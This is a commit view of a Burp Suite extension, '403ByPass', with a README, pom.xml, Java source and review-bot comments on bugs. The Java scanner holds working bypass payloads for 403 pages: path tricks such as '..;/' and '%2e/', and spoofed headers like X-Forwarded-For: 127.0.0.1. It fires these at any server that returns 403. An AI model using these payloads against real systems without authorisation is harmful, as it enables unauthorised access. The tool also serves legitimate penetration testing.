403ByPass_BaiZeSEC-1.0
aaaahuia committed Sep 9, 2022
1 parent 0192ee2 commit 7238dc0
Showing 46 changed files with 4,441 additions and 1 deletion.
27 changes: 26 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
@@ -1,2 +1,27 @@
# 403ByPass
403ByPass-Burp Extensions_java

**403绕过-BurpSuite插件 by 白泽Sec-ahui**

联系方式:[email protected]

#### 工具简述:

基于常见的框架漏洞或IP伪造尝试绕过网页403限制

#### 使用方法:

`BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Java -> Select file: 403ByPass_BaiZeSEC-1.0.jar -> Next till Finish`

#### 测试代码:

```php
<?php
if($_SERVER['HTTP_X_FORWARDED_FOR']=="127.0.0.1"){
http_response_code(200);
print("200 success");
}else{
http_response_code(403);
print("403 error");
}
```

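--- a/pom.xml
+++ b/pom.xml
@@ -0,0 +1,134 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+<modelVersion>4.0.0</modelVersion>
+
+<groupId>org.Baize</groupId>
+<artifactId>403ByPass_BaizeSEC</artifactId>
+<version>1.0</version>
+
+<name>403bypass_BaiZeSEC</name>
+<!-- FIXME change it to the project's website -->
+<url>http://www.example.com</url>
+
+<properties>
+<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+<maven.compiler.source>1.7</maven.compiler.source>
+<maven.compiler.target>1.7</maven.compiler.target>
+</properties>
+
+<dependencies>
+<dependency>
+<groupId>junit</groupId>
+<artifactId>junit</artifactId>
+<version>4.11</version>
+<scope>test</scope>
+</dependency>
+<dependency>
+<groupId>net.portswigger.burp.extender</groupId>
+<artifactId>burp-extender-api</artifactId>
+<version>1.7.22</version>
+</dependency>
+
+<!-- https://mvnrepository.com/artifact/com.google.code.gson/gson -->
+<dependency>
+<groupId>com.google.code.gson</groupId>
+<artifactId>gson</artifactId>
+<version>2.8.6</version>
+</dependency>
+
+<!-- to get root domain -->
+<dependency>
+<groupId>com.google.guava</groupId>
+<artifactId>guava</artifactId>
+<version>30.1-jre</version>
+</dependency>
+
+<!-- https://mvnrepository.com/artifact/org.apache.commons/commons-text -->
+<dependency>
+<groupId>org.apache.commons</groupId>
+<artifactId>commons-text</artifactId>
+<version>1.9</version>
+</dependency>
+
+<!-- https://mvnrepository.com/artifact/org.beanshell/bsh -->
+<dependency>
+<groupId>org.beanshell</groupId>
+<artifactId>bsh</artifactId>
+<version>2.0b5</version>
+</dependency>
+</dependencies>
+
+<build>
+<sourceDirectory>src</sourceDirectory>
+<pluginManagement><!-- lock down plugins versions to avoid using Maven defaults (may be moved to parent pom) -->
+<plugins>
+
+<plugin>
+<artifactId>maven-assembly-plugin</artifactId>
+<configuration>
+<descriptorRefs>
+<descriptorRef>jar-with-dependencies</descriptorRef>
+</descriptorRefs>
+<archive>
+<manifest>
+<addDefaultImplementationEntries>
+true<!--to get Version from pom.xml -->
+</addDefaultImplementationEntries>
+</manifest>
+</archive>
+</configuration>
+<executions>
+<execution>
+<id>make-assembly</id>
+<phase>package</phase>
+<goals>
+<goal>single</goal>
+</goals>
+</execution>
+</executions>
+</plugin>
+<!-- clean lifecycle, see https://maven.apache.org/ref/current/maven-core/lifecycles.html#clean_Lifecycle -->
+<plugin>
+<artifactId>maven-clean-plugin</artifactId>
+<version>3.1.0</version>
+</plugin>
+<!-- default lifecycle, jar packaging: see https://maven.apache.org/ref/current/maven-core/default-bindings.html#Plugin_bindings_for_jar_packaging -->
+<plugin>
+<artifactId>maven-resources-plugin</artifactId>
+<version>3.0.2</version>
+</plugin>
+<plugin>
+<artifactId>maven-compiler-plugin</artifactId>
+<version>3.8.0</version>
+</plugin>
+<plugin>
+<artifactId>maven-surefire-plugin</artifactId>
+<version>2.22.1</version>
+</plugin>
+<plugin>
+<artifactId>maven-jar-plugin</artifactId>
+<version>3.0.2</version>
+</plugin>
+<plugin>
+<artifactId>maven-install-plugin</artifactId>
+<version>2.5.2</version>
+</plugin>
+<plugin>
+<artifactId>maven-deploy-plugin</artifactId>
+<version>2.8.2</version>
+</plugin>
+<!-- site lifecycle, see https://maven.apache.org/ref/current/maven-core/lifecycles.html#site_Lifecycle -->
+<plugin>
+<artifactId>maven-site-plugin</artifactId>
+<version>3.7.1</version>
+</plugin>
+<plugin>
+<artifactId>maven-project-info-reports-plugin</artifactId>
+<version>3.0.0</version>
+</plugin>
+</plugins>
+</pluginManagement>
+</build>
+</project>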
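Review bot: Four compile-scope dependencies are declared in this file (gson, guava, commons-text and bsh) that the only Java source visible in this commit (src/burp/BurpExtender.java) does not reference, and the jar-with-dependencies assembly will bundle every one of them into the extension jar handed to Burp. If they are leftovers from a template, removing them keeps the shipped jar and its supply-chain surface down to the Burp extender API; if other files in the 46-file change set use them, a one-line comment per dependency naming its consumer (the existing `<!-- to get root domain -->` on guava is the model) would make that auditable. The `FIXME` above `<url>` should be resolved or the element dropped before the 1.0 release is tagged.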
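--- a/src/burp/BurpExtender.java
+++ b/src/burp/BurpExtender.java
@@ -0,0 +1,136 @@
+package burp;
+
+import java.io.PrintWriter;
+import java.util.ArrayList;
+import java.util.Arrays;
+import java.util.List;
+
+public class BurpExtender implements IBurpExtender,IScannerCheck
+{
+private IExtensionHelpers _helpers;
+private PrintWriter stdout;
+private PrintWriter stderr;
+private IBurpExtenderCallbacks _callbacks;
+public static String NAME = "403ByPass_BaizeSEC";
+public static String VERSION = "1.0";
+
+@Override
+public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks)
+{
+// 设置插件的名称
+callbacks.setExtensionName(NAME);
+this._callbacks = callbacks;
+
+// 获取burp提供的标准输出流和错误输出流
+stdout = new PrintWriter(callbacks.getStdout(), true);
+stderr = new PrintWriter(callbacks.getStderr(), true);
+
+_helpers = callbacks.getHelpers();
+
+callbacks.registerScannerCheck(this);
+this.stdout.println(basicInformationOutput());
+
+}
+
+
+@Override
+public List<IScanIssue> doPassiveScan(IHttpRequestResponse baseRequestResponse) {
+
+List<String> results = new ArrayList<>();
+
+
+IRequestInfo iRequestInfo = _helpers.analyzeRequest(baseRequestResponse);
+
+
+IResponseInfo iResponseInfo = _helpers.analyzeResponse(baseRequestResponse.getResponse());
+
+if(iResponseInfo.getStatusCode()!=403) return null;
+String oldReq = _helpers.bytesToString(baseRequestResponse.getRequest());
+String oldUrl = iRequestInfo.getUrl().getPath();
+while(oldUrl!="/" && oldUrl.endsWith("/")){
+oldUrl=oldUrl.substring(0,oldUrl.length()-1);
+}
+String previousPath = oldUrl.substring(0,oldUrl.lastIndexOf("/"));
+String lastPath = oldUrl.substring(oldUrl.lastIndexOf("/")+1);
+
+
+stdout.println("Scanning: "+iRequestInfo.getUrl());
+
+String[] payloads = new String[]{"%2e/"+lastPath, lastPath+"/.", "./"+lastPath+"/./", lastPath+"%20/", "%20"+lastPath+"%20/", lastPath+"..;/",lastPath+"?",lastPath+"??","/"+lastPath+"//",lastPath+"/",lastPath+"/.randomstring"};
+String[] hpayloads = new String[]{"X-Rewrite-URL: "+oldUrl, "X-Original-URL: "+oldUrl,"Referer: /"+lastPath, "X-Custom-IP-Authorization: 127.0.0.1","X-Originating-IP: 127.0.0.1","X-Forwarded-For: 127.0.0.1","X-Remote-IP: 127.0.0.1","X-Client-IP: 127.0.0.1","X-Host: 127.0.0.1","X-Forwarded-Host: 127.0.0.1"};
+
+for(String p:payloads){
+String newReq = oldReq.replace(oldUrl,previousPath+"/"+p);
+IHttpRequestResponse checkRequestResponse = _callbacks.makeHttpRequest(baseRequestResponse.getHttpService(),_helpers.stringToBytes(newReq));
+short STT_CODE = _helpers.analyzeResponse(checkRequestResponse.getResponse()).getStatusCode();
+if(STT_CODE == 200) {
+results.add("Url payload: "+_helpers.analyzeRequest(checkRequestResponse).getUrl()+" | Status code: "+STT_CODE);
+}
+}
+
+for(String hp:hpayloads){
+String newReq="";
+if(hp.startsWith("Referer:") && oldReq.contains("Referer:")){
+newReq = oldReq.replace("^Referer:.*?$",hp);
+}else{
+newReq = oldReq.replace("User-Agent: ",hp+"\r\n"+"User-Agent: ");
+}
+
+IHttpRequestResponse checkRequestResponse = _callbacks.makeHttpRequest(baseRequestResponse.getHttpService(),_helpers.stringToBytes(newReq));
+short STT_CODE = _helpers.analyzeResponse(checkRequestResponse.getResponse()).getStatusCode();
+if(STT_CODE == 200) {
+results.add("Header payload: "+hp+" | Status code: "+STT_CODE);
+}
+
+}
+if(results.toString().equals("[]")) return null;
+CustomScanIssue customScanIssue = new CustomScanIssue(
+_helpers.analyzeRequest(baseRequestResponse).getUrl(),
+"403 ByPass Vuln",
+0,
+"High",
+"Certain",
+null,
+null,
+results.toString(),
+null,
+new IHttpRequestResponseWithMarkers[]{_callbacks.applyMarkers(baseRequestResponse, null, null)},
+baseRequestResponse.getHttpService()
+);
+
+List<IScanIssue> issues = new ArrayList<>();
+issues.add(customScanIssue);
+stdout.println("===================================");
+stdout.println("恭喜!有一个漏洞被发现,漏洞信息为: "+_helpers.analyzeRequest(baseRequestResponse).getUrl()+" "+results);
+stdout.println("===================================");
+return issues;
+}
+
+@Override
+public List<IScanIssue> doActiveScan(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) {
+return null;
+}
+
+@Override
+public int consolidateDuplicateIssues(IScanIssue existingIssue, IScanIssue newIssue) {
+if (existingIssue.getUrl()==newIssue.getUrl()) return -1;
+return 0;
+}
+
+/**
+* 基本信息输出
+*/
+private static String basicInformationOutput() {
+
+String str1 = "===================================\n";
+String str2 = String.format("%s 加载成功\n", NAME);
+String str3 = String.format("版本: %s\n", VERSION);
+String str4 = "作者: BaiZeSec_ahui\n";
+String str5 = "邮箱: [email protected]\n";
+String str6 = "===================================\n";
+String detail = str1 + str2 + str3 + str4 + str5 + str6;
+return detail;
+}
+
+
+}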
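Review bot: `oldUrl!="/"` in the trailing-slash loop of doPassiveScan is a reference comparison, so a path of `/` (a fresh String from getPath()) is still trimmed down to the empty string, `lastIndexOf("/")` on the next line returns -1 and `substring(0,-1)` throws StringIndexOutOfBoundsException inside the scanner callback; an empty path fails the same way. Change the condition to `!oldUrl.equals("/")` and add `if (oldUrl.isEmpty() || oldUrl.equals("/")) return null;` after the loop, since there is no path segment to rewrite in either case. Two more equality mistakes in the same hunk: `oldReq.replace("^Referer:.*?$",hp)` is a literal, non-regex replace that never matches, so the Referer probe is sent as the unmodified request (use `oldReq.replaceFirst("(?m)^Referer:.*$", Matcher.quoteReplacement(hp))`, which needs `java.util.regex.Matcher` imported), and `existingIssue.getUrl()==newIssue.getUrl()` in consolidateDuplicateIssues compares URL references, so duplicate issues are never merged (compare `getUrl().toExternalForm()` with `equals`). Separately, the IScannerCheck Javadoc asks that doPassiveScan not issue HTTP requests of its own, yet this implementation sends up to 21 probes for every in-scope 403 response while doActiveScan returns null; moving the probing into doActiveScan (or behind an explicit opt-in) keeps passive scanning side-effect free and gives the user control over the request volume.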
